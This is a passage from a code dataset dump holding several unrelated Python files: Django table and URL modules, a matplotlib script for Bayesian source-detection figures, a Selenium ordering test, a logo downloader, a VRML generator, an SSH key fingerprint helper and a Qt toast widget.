lofd,\n ['job_num','job_line_id'],\n ['Number','ID'])\n \ndef job_lines_raw_3():\n return ('Job Lines',\n m.JobJournalLine.objects.all().values(),\n ['line_no','job_line_id'],\n ['Number','ID'])\n \n\ndef job_lines_raw_4():\n lofd=[]\n for jjl in m.JobJournalLine.objects.all():\n row={}\n row['Hi']=jjl.job_line_id\n row['Bye']= 3*12+15\n lofd.append(row) \n \n return ('Job Lines',\n lofd,\n ['Hi','Bye'],\n ['Number','ID'])","sub_path":"forecast/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"209085194","text":"import matplotlib\nmatplotlib.rcParams['figure.figsize'] = (5,5)\nmatplotlib.use('Agg')\nmatplotlib.rc('text', usetex=True)\nmatplotlib.rc('font', family='serif')\nimport pylab as plt\nimport numpy as np\nfrom scipy.special import erf\nfrom scipy.stats 
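# Aside: the list-of-dicts + operator.itemgetter pattern used throughout the
# tables module above, in isolation (sample rows are made up for illustration):
from operator import itemgetter

rows = [{'short_id': 'B2', 'hours': 40.0}, {'short_id': 'A1', 'hours': 37.5}]
by_id = sorted(rows, key=itemgetter('short_id'))                # ascending
by_hours = sorted(rows, key=itemgetter('hours'), reverse=True)  # descending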
import norm\n\n'''\n\n2-band example showing behavior of Bayesian SED-matched detection.\n\nWe first show the behavior of a single \"red\" detection filter.\n\n(Next, we look at a two-SED prior and examine how the weights affect\nthe locus of the threshold.)\n\nThen we look at a three-SED model (\"flat\", \"red\", and \"r-only\").\n\nFinally, we look at an empirical (DECaLS) SED.\n\n'''\n\nplt.subplots_adjust(left=0.1, right=0.98, bottom=0.1, top=0.98)\n\n# Assuming unit variance on the detection maps; signal = S/N.\nsig_g = 1.\nsig_r = 1.\nsig_j = np.array([sig_g, sig_r])\n\nsed_red = np.array([1., 2.5])\nsed_red /= np.sum(sed_red)\n\nsed_ronly = np.array([0., 1.])\n\nsed_flat = np.array([1., 1.])\nsed_flat /= np.sum(sed_flat)\n\n# Grid of detection-map values\n#dextent = [-5,10,-5,10]\n#dextent = [-5,11,-5,11]\ndextent = [-5.5,11,-5.5,11]\ndgvals = np.linspace(dextent[0], dextent[1], 320)\ndrvals = np.linspace(dextent[2], dextent[3], 320)\nd_j = np.array(np.meshgrid(dgvals, drvals))\n# d_j: shape (2, N, N)\n# Plotting axes for some plots\nax1 = [-2,10,-2,10]\n\ndef get_pratio(d_j, sig_j, sed_i, alpha = 1.):\n '''\n Get the probability ratio (fg/bg) for given data points and SED.\n\n alpha: exponential prior on total flux\n '''\n a_i = alpha - np.sum(d_j * sed_i[:,np.newaxis,np.newaxis] / sig_j[:,np.newaxis,np.newaxis]**2, axis=0)\n b_i = 0.5 * np.sum(sed_i**2 / sig_j**2)\n beta_i = 2 * np.sqrt(b_i)\n c_i = a_i / beta_i\n pratio_i = alpha * np.sqrt(np.pi) / beta_i * np.exp(c_i**2) * (1. - erf(c_i))\n return pratio_i\n\n\n# Background probability\np_bg = 1./np.prod(np.sqrt(2.*np.pi)*sig_j) * np.exp(-0.5 * np.sum((d_j / sig_j[:,np.newaxis,np.newaxis])**2, axis=0))\n\npratio_red = get_pratio(d_j, sig_j, sed_red)\npratio_ronly = get_pratio(d_j, sig_j, sed_ronly)\npratio_flat = get_pratio(d_j, sig_j, sed_flat)\n\npratio_a = pratio_red\np_fg_a = p_bg * pratio_a\n\n# 5-sigma (one-sided) Gaussian false positive rate, for comparison\n# falsepos = norm.sf(5.)\n# print(falsepos)\n# print(falsepos * 4e3*4e3, 'false positives per 4k x 4k image')\n\ndef contour_plot(p_bg, p_fg, seds,\n style1=dict(linestyles='-', alpha=0.3, linewidths=3, colors='k'),\n style2=dict(linestyles='-', colors='b'),\n label1='Background (noise) model',\n label2='Foreground (source) model'):\n levs = np.arange(-6, 0)\n c1 = plt.contour(np.log10(p_bg), levels=levs, extent=dextent, **style1)\n c2 = plt.contour(np.log10(p_fg), levels=levs, extent=dextent, **style2)\n \n plt.xlabel('g-band detection map S/N')\n plt.ylabel('r-band detection map S/N')\n plt.axhline(0, color='k', alpha=0.2)\n plt.axvline(0, color='k', alpha=0.2)\n xx = np.array([0,100])\n for sed,c in seds:\n plt.plot(xx * sed[0], xx * sed[1], '-', color=c, alpha=0.5, lw=3)\n plt.axis('square')\n plt.legend([c2.collections[0], c1.collections[0]],\n [label2, label1],\n loc='lower right')\n\ndef rel_contour_plot(pratio, seds):\n levs = np.arange(0, 11)\n plt.contour(np.log10(pratio), levels=levs, linestyles='-', extent=dextent, colors='k')\n plt.xlabel('g-band detection map S/N')\n plt.ylabel('r-band detection map S/N')\n plt.axhline(0, color='k', alpha=0.2)\n plt.axvline(0, color='k', alpha=0.2)\n xx = np.array([0,100])\n for sed,c in seds:\n plt.plot(xx * sed[0], xx * sed[1], '-', color=c, alpha=0.5, lw=3)\n plt.axis('square');\n\nplt.clf()\ncontour_plot(p_bg, p_fg_a, [(sed_red, 'r')])\naxa = [-5.5,11, -5.5,11]\nplt.axis(axa)\nplt.savefig('prob-contours-a.pdf')\n\nplt.clf()\nrel_contour_plot(pratio_a, [(sed_red, 
'r')])\nplt.axis(axa)\nplt.savefig('prob-rel-a.pdf')\n\npratio_b = 0.49 * pratio_red + 0.49 * pratio_flat + 0.02 * pratio_ronly\np_fg_b = p_bg * pratio_b\n\nplt.clf()\nplotseds = [(sed_red, 'r'), (sed_flat, 'b'), (sed_ronly, 'm')]\ncontour_plot(p_bg, p_fg_b, plotseds)\nplt.axis(axa)\nplt.savefig('prob-contours-b.pdf')\n\nplt.clf()\nrel_contour_plot(pratio_b, plotseds)\nplt.axis(axa)\nplt.savefig('prob-rel-b.pdf')\n\n######\n\n#sed_red2 = np.array([1., 2.5])\nsed_red2 = sed_red * 2\n\npratio_red2 = get_pratio(d_j, sig_j, sed_red2)\npratio_c = pratio_red2\np_fg_c = p_bg * pratio_c\n\n# plt.clf()\n# contour_plot(p_bg, p_fg_c, [(sed_red2, 'r')])\n# axa = [-5.5,11, -5.5,11]\n# plt.axis(axa)\n# plt.savefig('prob-contours-c.pdf')\n\n\nplt.clf()\ncontour_plot(p_fg_a, p_fg_c, [(sed_red2, 'r')],\n style1=dict(colors='b', linestyles='-'),\n style2=dict(colors='r', linestyles='--'),\n label1='Foreground model, faint luminosity function',\n label2='Foreground model, bright luminosity function')\naxa = [-5.5,11, -5.5,11]\nplt.axis(axa)\nplt.savefig('prob-contours-c.pdf')\n\n\nsed_red3 = sed_red\npratio_red3 = get_pratio(d_j, sig_j, sed_red3, alpha=0.5)\npratio_d = pratio_red3\np_fg_d = p_bg * pratio_d\nplt.clf()\ncontour_plot(p_fg_a, p_fg_c, [(sed_red2, 'r')],\n style1=dict(colors='b', linestyles='-'),\n style2=dict(colors='r', linestyles='--'),\n label1='Foreground model',\n label2='Foreground model, s * 2')\naxa = [-5.5,11, -5.5,11]\nplt.axis(axa)\nplt.savefig('prob-contours-d.pdf')\n\n\nsed_1a = np.array([1.])\nsed_1b = np.array([2.])\n\nd_one = np.linspace(-10, +30, 500)\nsig_one = np.array([1.])\np_bg_one = 1./np.prod(np.sqrt(2.*np.pi)*sig_one) * np.exp(-0.5 * (d_one / sig_one)**2)\n\npratio_1a = get_pratio(d_one, sig_one, sed_1a)\np_fg_1a = p_bg_one * pratio_1a\npratio_1b = get_pratio(d_one, sig_one, sed_1b)\np_fg_1b = p_bg_one * pratio_1b\n\n#sed_1c = np.array([1.])\n#pratio_1c = get_pratio(d_one, sig_one, sed_1c, alpha=0.5)\n#p_fg_1c = p_bg_one * pratio_1c\n\n# plt.clf()\n# plt.plot(d_one, p_bg_one, 'k-', lw=3, alpha=0.3, label='Background model')\n# plt.plot(d_one, p_fg_1a[0,:], 'b-', label='Foreground model')\n# #plt.plot(d_one, np.exp(-d_one), 'b--')\n# plt.plot(d_one, p_fg_1b[0,:], 'r--', label='Foreground model, s * 2')\n# #plt.plot(d_one, np.exp(-d_one/4.), 'r--')\n# #plt.ylim(0, p_bg_one.max())\n# plt.axvline(0., color='k', alpha=0.1)\n# plt.axhline(0., color='k', alpha=0.1)\n# plt.xlim(-4,12)\n# plt.legend()\n# plt.yticks(np.arange(0, 0.41, 0.1))\n# plt.xlabel('Detection map values')\n# plt.ylabel('Probability')\n# plt.savefig('prob-1a.pdf')\n# \n# flux_1a = d_one / sed_1a\n# flux_1b = d_one / sed_1b\n# ia = np.argmax(p_fg_1a)\n# ib = np.argmax(p_fg_1b)\n# plt.clf()\n# plt.plot(flux_1a, p_fg_1a[0,:], 'b-', label='Foreground model')\n# plt.plot(flux_1b, p_fg_1b[0,:] * sed_1b, 'r--', label='Foreground model, s * 2')\n# plt.axvline(flux_1a[ia], color='b', alpha=0.1)\n# plt.axvline(flux_1b[ib], color='r', alpha=0.1)\n# plt.axvline(0., color='k', alpha=0.1)\n# plt.axhline(0., color='k', alpha=0.1)\n# plt.legend()\n# plt.xlabel('Flux (implied by detection map)')\n# plt.ylabel('Probability')\n# plt.xlim(-4,8)\n# plt.savefig('prob-1b.pdf')\n\n\nflux_1a = d_one / sed_1a\nflux_1b = d_one / sed_1b\n\nprior1a = np.exp(-flux_1a) * (flux_1a > 0)\nprior1b = np.exp(-flux_1b) * (flux_1b > 0)\n\nplt.clf()\n#plt.subplots_adjust(hspace=0)\nplt.subplots_adjust(hspace=0.2)\n\n#ax1 = plt.subplot2grid((3,1), (0, 0), rowspan=2)\nax1 = plt.subplot2grid((2,1), (1, 0))\nplt.plot(d_one, p_bg_one, 'k-', lw=3, 
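# Aside: a numerical cross-check (not in the original script) of the closed form
# behind get_pratio above. The foreground density is the Gaussian likelihood
# marginalised over an exponential flux prior, so direct quadrature over flux
# should reproduce p_bg * pratio for a single band with SED weight s:
import numpy as np
from scipy.integrate import quad
from scipy.stats import norm

def p_fg_numeric(d, s=1.0, sigma=1.0, alpha=1.0):
    # integrand: alpha * exp(-alpha * f) * N(d; f * s, sigma)
    integrand = lambda f: alpha * np.exp(-alpha * f) * norm.pdf(d, loc=f * s, scale=sigma)
    value, _err = quad(integrand, 0.0, np.inf)
    return value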
alpha=0.3, label='Background model')\nplt.plot(d_one, p_fg_1a[0,:], 'b-', label='Faint luminosity function') #'Foreground model, faint luminosity function')\nplt.plot(d_one, p_fg_1b[0,:], 'r--', label='Bright luminosity function') #'Foreground model, bright luminosity function')\n#plt.plot(d_one, p_fg_1c[0,:], 'g:', label='Foreground model, alpha = 0.5')\nplt.axvline(0., color='k', alpha=0.1)\nplt.axhline(0., color='k', alpha=0.1)\nplt.xlim(-4,8)\n#plt.yticks(np.arange(0, 0.41, 0.1))\nplt.yticks(np.arange(0, 0.41, 0.2))\nplt.xlabel('Observed flux ($\\sigma$)')\n#plt.xlabel('Observed flux (arb. units)')\n#plt.xticks([])\nplt.legend()\nplt.ylabel('Posterior Probability')\n\n#ax2 = plt.subplot2grid((3,1), (2, 0))\nax2 = plt.subplot2grid((2,1), (0, 0))\nplt.plot(d_one, prior1a, 'b-', label='Faint luminosity function') #'Foreground prior')\n# /2 to normalize (~ d_d / d_flux)\nplt.plot(d_one, prior1b/2., 'r--', label='Bright luminosity function') #Foreground prior, s * 2')\nplt.axhline(0., color='k', alpha=0.1)\nplt.axvline(0., color='k', alpha=0.1)\nplt.xlim(-4,8)\nplt.yticks([0, 0.5, 1.0])\nplt.ylabel('Prior probability')\nplt.xlabel('Prior flux (arb. units)')\nplt.xticks([])\n#plt.xlabel('Detection map values')\nplt.legend()\nplt.savefig('prob-1d.pdf')\n","sub_path":"bayes-figure.py","file_name":"bayes-figure.py","file_ext":"py","file_size_in_byte":8589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70352366","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException\nimport random\n\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference(\"general.useragent.override\",\n \"Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0\")\n\nfirefox_capabilities = webdriver.DesiredCapabilities.FIREFOX\nfirefox_capabilities['marionette'] = True\nfirefox_capabilities['binary'] = r\"C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe\"\n\nbinary = FirefoxBinary(r\"C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe\")\n\n\nclass BasicTestCases:\n def driver_ini(self):\n driver = webdriver.Firefox()\n self.driver = driver\n driver.maximize_window()\n self.driver.get('https://bgmenu.com')\n\n def login_test(self):\n login_button = self.driver.find_element_by_css_selector(\"#user-nav > ul > li:nth-child(2) > a\")\n login_button.click()\n sleep(2)\n email_input = self.driver.find_element_by_css_selector(\"#email\")\n email_input.send_keys(\"m.ivanov@oliviera.ro\")\n pass_input = self.driver.find_element_by_css_selector(\"#password\")\n pass_input.send_keys(\"testtest\")\n login_submit = self.driver.find_element_by_css_selector(\"#submit-btn\")\n login_submit.click()\n\n def make_order_test(self):\n for i in range(3):\n address_field = self.driver.find_element_by_css_selector(\n \"#main-search > div > div.input-hold.neighbourhood > input\")\n address_field.clear()\n streets = \"Бул България 111\"\n address_field.send_keys(streets)\n sleep(2)\n address_field.send_keys(Keys.ARROW_DOWN)\n sleep(2)\n address_field.send_keys(Keys.ENTER)\n sleep(2)\n address_field.send_keys(Keys.ENTER)\n sleep(2)\n search_restaurant = self.driver.find_element_by_css_selector(\"#search\")\n search_restaurant.send_keys(\"Annette\")\n search_restaurant.send_keys(Keys.ENTER)\n selected_restaurant = self.driver.find_element_by_css_selector(\n \"#result-list > 
li > div.place-info > div.place-header-wrapper > a > h2\")\n selected_restaurant.click()\n meal_add = self.driver.find_element_by_css_selector(\n \"#meal-2242 > form > div.item-details > div.item-add-to-car > a\")\n meal_add.click()\n sleep(4)\n\n try:\n continue_order = self.driver.find_element_by_css_selector(\n \"#general_popup_content > div.text-center > a.green_btn.continue-add-to-cart\")\n continue_order.click()\n sleep(3)\n meal_add.click()\n meal_add.click()\n except NoSuchElementException:\n sleep(2)\n meal_add.click()\n meal_add.click()\n\n sleep(3)\n order_input = self.driver.find_element_by_css_selector(\n \"#container > section.page_content.clearfix > div:nth-child(4) > aside > div > section > a\")\n order_input.click()\n sleep(3)\n address_selector = self.driver.find_element_by_css_selector(\"#address_id\")\n sleep(3)\n\n try:\n self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div:nth-child(2) > div > div > div.address-not-supported > span\")\n address_selector.click()\n address_selector.send_keys(Keys.ARROW_DOWN)\n address_selector.send_keys(Keys.ENTER)\n sleep(3)\n add_comment = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div:nth-child(2) > div.leave-comment > label > span\")\n add_comment.click()\n comment_field = self.driver.find_element_by_css_selector(\"#order-comment\")\n comment_field.clear()\n comment_field.send_keys(\"BGMENU ТЕСТ! НЕ ПРИГОТВЯЙТЕ!\")\n order_submit = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div.row > div.col-md-3 > a\")\n order_submit.click()\n except NoSuchElementException:\n sleep(3)\n add_comment = self.driver.find_element_by_css_selector(\n \"#cart-detiles-cont > div.main-content-ordered > div:nth-child(2) > div.leave-comment > label > span\")\n add_comment.click()\n comment_field = self.driver.find_element_by_css_selector(\"#order-comment\")\n comment_field.clear()\n comment_field.send_keys(\"BGMENU ТЕСТ! 
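# Aside: the fixed sleep() calls in this test make it slow and brittle; an
# explicit wait polls until a condition holds and fails fast otherwise. A sketch
# with Selenium's standard support classes (the selector argument is a
# placeholder, not one of the selectors used above):
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def click_when_ready(driver, css_selector, timeout=10):
    element = WebDriverWait(driver, timeout).until(
        EC.element_to_be_clickable((By.CSS_SELECTOR, css_selector))
    )
    element.click()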
НЕ ПРИГОТВЯЙТЕ!\")\n                order_submit = self.driver.find_element_by_css_selector(\n                    \"#cart-detiles-cont > div.main-content-ordered > div.row > div.col-md-3 > a\")\n                order_submit.click()\n\n            sleep(2)\n\n            '''try:\n                self.driver.find_element_by_css_selector(\"#cart-detiles-cont > div:nth-child(3) > div > div > span > span\")\n                self.driver.find_element_by_css_selector(\"#cart-detiles-cont > div:nth-child(3) > div > div > div:nth-child(3) > label\").click()\n                sleep(2)\n                self.driver.find_element_by_css_selector(\"#cart-detiles-cont > div:nth-child(3) > div > div > div:nth-child(1) > label\").click()\n                sleep(2)\n                order_submit.click()\n                sleep(3)\n            except NoSuchElementException:\n                order_submit.click()\n                sleep(2)'''\n            self.driver.find_element_by_css_selector(\"#logo\").click()\n            sleep(2)\n\n\nweb = BasicTestCases\nweb.driver_ini(web)\nweb.login_test(web)\nweb.make_order_test(web)\n","sub_path":"firefox_test.py","file_name":"firefox_test.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"593503330","text":"from django.conf.urls import patterns, include, url\n\nfrom articles import views\n\nurlpatterns = patterns('',\n\t#articles\n    url(\n\t    r'^articles/$',\n\t\tviews.ArticlesListAPIView.as_view(),\n        name='article-list',\n    ),\n    url(\n\t    r'^articles/(?P<pk>[0-9]+)/$',\n        views.ArticleDetailAPIView.as_view(),\n        name='article-detail',\n    ),\n    #comments\n    url(\n\t    r'^articles/(?P<article_id>[0-9]+)/comments/$',\n        views.CommentListAPIView.as_view(),\n\t\tname='comment-list',\n    ),\n    url(\n\t    r'^articles/(?P<article_id>[0-9]+)/comments/(?P<pk>[0-9]+)/$',\n        views.CommentDetailAPIView.as_view(),\n        name='comment-detail',\n    ),\n    url(\n\t    r'^users/(?P<pk>[0-9]+)/$',\n        views.UserDetailAPIView.as_view(),\n        name='user-detail',\n    ),\n    url(\n\t    r'^users/(?P<pk>[0-9]+)/articles/$',\n        views.ArticleForUserListApiView.as_view(),\n    ),\n)\n\nurlpatterns += patterns('',\n    url(\n\t    r'^api-auth/',\n        include('rest_framework.urls', namespace='rest_framework'),\n    )\n)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"project/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"595974503","text":"# encoding=utf8\nimport requests\nimport shutil\nimport xml.dom.minidom as minidom\n\nxmlfile='bel.xml'\nxml=minidom.parse(xmlfile)\nitems=xml.getElementsByTagName('C')\nfor s in items:\n\ttry:\n\t\tconv=[]\n\t\tid_=s.attributes['id'].value\n\n\t\tname=s.attributes['n'].value\n\t\tfor letter in name:\n\t\t\tletter.encode('ascii','ignore')\n\t\t\tconv.append(letter)\n\t\t\n\t\timgname=xmlfile[4:7]+\"_\"+unicode(''.join(conv))+\"_\"+id_\n\n\t\tr=requests.get('http://smimgs.com/images/logos/clubs/'+str(id_)+\".jpg\",stream=True)\n\n\t\tif r.status_code==200:\n\t\t\twith open(str(imgname),'wb') as f:\n\t\t\t\tr.raw.decode_content=True\n\t\t\t\tshutil.copyfileobj(r.raw,f)\n\texcept Exception as e:\n\t\tfile_ = open(\"lost_club_logos.txt\",\"a\")\n\t\tfile_.write(xmlfile[4:7]+\"_\"+id_) \n\t\tfile_.write(\"\\n\") \n\t\tfile_.close()\n\t\tpass\n","sub_path":"xp.py","file_name":"xp.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"116576954","text":"from django.urls import path\r\nfrom . 
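# Aside: patterns() used in the articles URLconf above was removed in Django
# 1.10; the same routes map onto plain path() entries in Django >= 2.0. A
# partial sketch (only the first two routes shown):
from django.urls import path
from articles import views

urlpatterns = [
    path('articles/', views.ArticlesListAPIView.as_view(), name='article-list'),
    path('articles/<int:pk>/', views.ArticleDetailAPIView.as_view(), name='article-detail'),
]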
import views # which views this app provides\r\n\r\napp_name = 'blog'\r\n\r\nurlpatterns = [\r\n\r\n    path('index/',views.index,name='index'), # the trailing / is required\r\n    path('create/',views.create,name='create'), # create does not need a parameter\r\n    path('<int:pk>/update/',views.update,name='update'),\r\n    path('<int:pk>/delete/',views.delete,name='delete'),\r\n    path('<int:pk>/',views.detail,name='detail'), # detail, without a separate url\r\n    path('<int:pk>/comment/',views.add_comment_to_post,name='add_comment_to_post'), # detail, without a separate url\r\n\r\n]\r\n","sub_path":"ch3/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"650511335","text":"filename_i = input(\"Input file name (no extension needed):\")\n\nprint(filename_i + \".txt is being read... \")\nf = open(filename_i + \".txt\", \"r\")\nlines = f.readlines()\norgdata = []\nfor i in lines:\n    orgdata.append(list(map(float, i.split())))\nf.close()\nsize_org = len(orgdata)\nprint(\"Reading finished (\", size_org, \"lines)\")\n\nout=str(\"\\n\")\nout+=(\"DEF TS3 TimeSensor{\\n\")\nout+=(\" cycleInterval 10\\n\")\nout+=(\" loop FALSE\\n\")\nout+=(\"}\\n\")\nout+=(\"DEF PI2 PositionInterpolator{\\n\")\nout+=(\" key[\")\n\nfor i in range(size_org):\n    out+=(str(i/size_org)+\",\")\nout+=(\"1]\\n\")\nout+=(\" keyValue[\")\n\nfor i in range(size_org):\n    print(\"\\r\",i,end=\" \")\n    out += str(orgdata[i][0])+\" \"\n    out += str(orgdata[i][1])+\" \"\n    out += str(orgdata[i][2])+\",\"\n\nout+=(\"]\\n\")\nout+=(\"}\\n\")\nout+=(\"ROUTE TS3.fraction_changed TO PI2.set_fraction\\n\")\nout+=(\"ROUTE PI2.value_changed TO UFO.translation\\n\")\nf=open(\"UFO.wrl\",mode=\"a\")\nf.write(out)\nf.close()\nprint(\"Appended to UFO.wrl\")","sub_path":"dev/s_test/VRML/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"386951861","text":"#! /usr/bin/python\n\nfrom subprocess import check_output\nimport os\nimport sys\nimport argparse\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Obtain md5 hash from id_rsa.pub')\n    parser.add_argument('-f','--file',help='Full path to id_rsa.pub. E.g. //id_rsa.pub', required=True)\n    args = vars(parser.parse_args())\n    fpath = args['file']\n    fs = fpath\n    key = None\n    fopen = None\n    for f in fs:\n        try:\n            fopen = fpath\n        except:\n            pass\n        finally:\n            if (fopen == None):\n                sys.stderr.write('No ssh key found at this location')\n                sys.exit(1)\n    md5_output = check_output(['ssh-keygen','-E','md5','-lf',fopen])\n    start_point = md5_output.index(':')\n    md5_output = md5_output[start_point+1:md5_output.index(' ',start_point+1)]\n    sys.stdout.write(md5_output)\n    sys.exit(0)\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"345069901","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains toast widget implementation\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nfrom Qt.QtCore import *\nfrom Qt.QtWidgets import *\nfrom Qt.QtGui import *\n\nimport tpDcc as tp\nfrom tpDcc.libs.qt.core import base, mixin, animation, theme\nfrom tpDcc.libs.qt.widgets import label, avatar, loading\n\n\n@mixin.theme_mixin\nclass BaseToast(base.BaseWidget, object):\n\n class ToastTypes(object):\n INFO = 'info'\n SUCCESS = 'success'\n WARNING = 'warning'\n ERROR = 'error'\n LOADING = 'loading'\n\n DEFAULT_CONFIG = {'duration': 2}\n\n toastClosed = Signal()\n\n def __init__(self, text, duration=None, toast_type=None, parent=None):\n self._text = text\n self._duration = duration\n self._toast_type = toast_type\n self._parent = parent\n super(BaseToast, self).__init__(parent=parent)\n\n def get_main_layout(self):\n main_layout = QVBoxLayout()\n main_layout.setContentsMargins(0, 0, 0, 0)\n\n return main_layout\n\n def ui(self):\n super(BaseToast, self).ui()\n\n self.setWindowFlags(Qt.FramelessWindowHint | Qt.Dialog | Qt.WA_TranslucentBackground | Qt.WA_DeleteOnClose)\n self.setAttribute(Qt.WA_StyledBackground)\n self.setFixedSize(QSize(120, 120))\n\n icon_layout = QHBoxLayout()\n icon_layout.addStretch()\n\n widget_theme = self.theme()\n\n if self._toast_type == self.ToastTypes.LOADING:\n icon_layout.addWidget(loading.CircleLoading(size=widget_theme.huge, color=widget_theme.text_color_inverse))\n else:\n icon_label = avatar.Avatar()\n icon_label.theme_size = 60\n icon_label.image = tp.ResourcesMgr().pixmap(\n self._toast_type or self.ToastTypes.INFO, color=widget_theme.text_color_inverse)\n icon_layout.addWidget(icon_label)\n icon_layout.addStretch()\n\n content_label = label.BaseLabel()\n content_label.setText(self._text or '')\n content_label.setAlignment(Qt.AlignCenter)\n\n self.main_layout.addStretch()\n self.main_layout.addLayout(icon_layout)\n self.main_layout.addSpacing(10)\n self.main_layout.addWidget(content_label)\n self.main_layout.addStretch()\n\n close_timer = QTimer(self)\n close_timer.setSingleShot(True)\n close_timer.timeout.connect(self.close)\n close_timer.timeout.connect(self.toastClosed.emit)\n close_timer.setInterval((self._duration or self.DEFAULT_CONFIG.get('duration', 2)) * 1000)\n\n anim_timer = QTimer(self)\n anim_timer.timeout.connect(self._fade_out)\n anim_timer.setInterval((self._duration or self.DEFAULT_CONFIG.get('duration', 2)) * 1000 - 300)\n\n self._opacity_anim = QPropertyAnimation()\n self._opacity_anim.setTargetObject(self)\n self._opacity_anim.setDuration(300)\n self._opacity_anim.setEasingCurve(QEasingCurve.OutCubic)\n self._opacity_anim.setPropertyName('windowOpacity')\n self._opacity_anim.setStartValue(0.0)\n self._opacity_anim.setEndValue(0.9)\n\n close_timer.start()\n anim_timer.start()\n\n self._get_center_position(self._parent)\n self._fade_in()\n\n @classmethod\n def info(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.INFO, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def success(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.SUCCESS, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def warning(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.WARNING, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def error(cls, text, parent, duration=None):\n inst 
= cls(text, duration=duration, toast_type=cls.ToastTypes.ERROR, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def loading(cls, text, parent, duration=None):\n inst = cls(text, duration=duration, toast_type=cls.ToastTypes.LOADING, parent=parent)\n inst.show()\n\n return inst\n\n @classmethod\n def config(cls, duration):\n if duration is not None:\n cls.DEFAULT_CONFIG['duration'] = duration\n\n def _fade_out(self):\n self._opacity_anim.setDirection(QAbstractAnimation.Backward)\n self._opacity_anim.start()\n\n def _fade_in(self):\n self._opacity_anim.start()\n\n def _get_center_position(self, parent):\n parent_parent = parent.parent()\n dcc_win = tp.Dcc.get_main_window()\n if dcc_win:\n dcc_window = parent_parent == dcc_win or parent_parent.objectName() == dcc_win.objectName()\n else:\n dcc_window = None\n parent_geo = parent.geometry()\n pos = parent_geo.topLeft() if dcc_window else parent.mapToGlobal(parent_geo.topLeft())\n offset = 0\n for child in parent.children():\n if isinstance(child, BaseToast) and child.isVisible():\n offset = max(offset, child.y())\n target_x = pos.x() + parent_geo.width() / 2 - self.width() / 2\n target_y = pos.y() + parent_geo.height() / 2 - self.height() / 2\n self.setProperty('pos', QPoint(target_x, target_y))\n\n\nclass ToastWidget(QLabel, object):\n \"\"\"\n Toast widget used to show quick messages to user\n \"\"\"\n\n DEFAULT_DURATION = 500\n DEFAULT_PADDING = 30\n\n def __init__(self, *args):\n super(ToastWidget, self).__init__(*args)\n\n self._timer = QTimer(self)\n self._timer.setSingleShot(True)\n self._timer.timeout.connect(self._on_fade_out)\n\n self._duration = self.DEFAULT_DURATION\n\n self.setMouseTracking(True)\n self.setAlignment(Qt.AlignCenter)\n self.setAttribute(Qt.WA_TransparentForMouseEvents)\n\n if self.parent():\n self.parent().installEventFilter(self)\n\n # def eventFilter(self, obj, event):\n # \"\"\"\n # Overrides base QLabel eventFilter function\n # Updates the geometry when the parent widget changes size\n # :param obj: QWidget\n # :param event: QEvent\n # \"\"\"\n #\n # if event.type() == QEvent.Resize:\n # self.updateGeometry()\n # return super(ToastWidget, self).eventFilter(obj, event)\n\n def updateGeometry(self):\n \"\"\"\n Overrides base QLabel updateGeometry function\n Updates and aligns the geometry to the parent widget\n \"\"\"\n\n padding = self.DEFAULT_PADDING\n widget = self.parent()\n\n width = self.text_width() + padding\n height = self.text_height() + padding\n x = widget.width() * 0.5 - width * 0.5\n y = (widget.height() - height) / 1.2\n\n self.setGeometry(x, y, width, height)\n\n def setText(self, *args, **kwargs):\n \"\"\"\n Overrides base QLabel setText function\n Updates the size depending on the text width\n :param text: str\n \"\"\"\n\n super(ToastWidget, self).setText(*args, **kwargs)\n self.updateGeometry()\n\n def show(self):\n \"\"\"\n Overrides base QLabel show function\n Starts the timer to hide the toast\n \"\"\"\n\n duration = self.duration()\n self._timer.stop()\n self._timer.start(duration)\n if not self.isVisible():\n animation.fade_in_widget(self, duration=0)\n super(ToastWidget, self).show()\n\n def duration(self):\n \"\"\"\n Returns duration\n :return: int\n \"\"\"\n\n return self._duration\n\n def set_duration(self, duration):\n 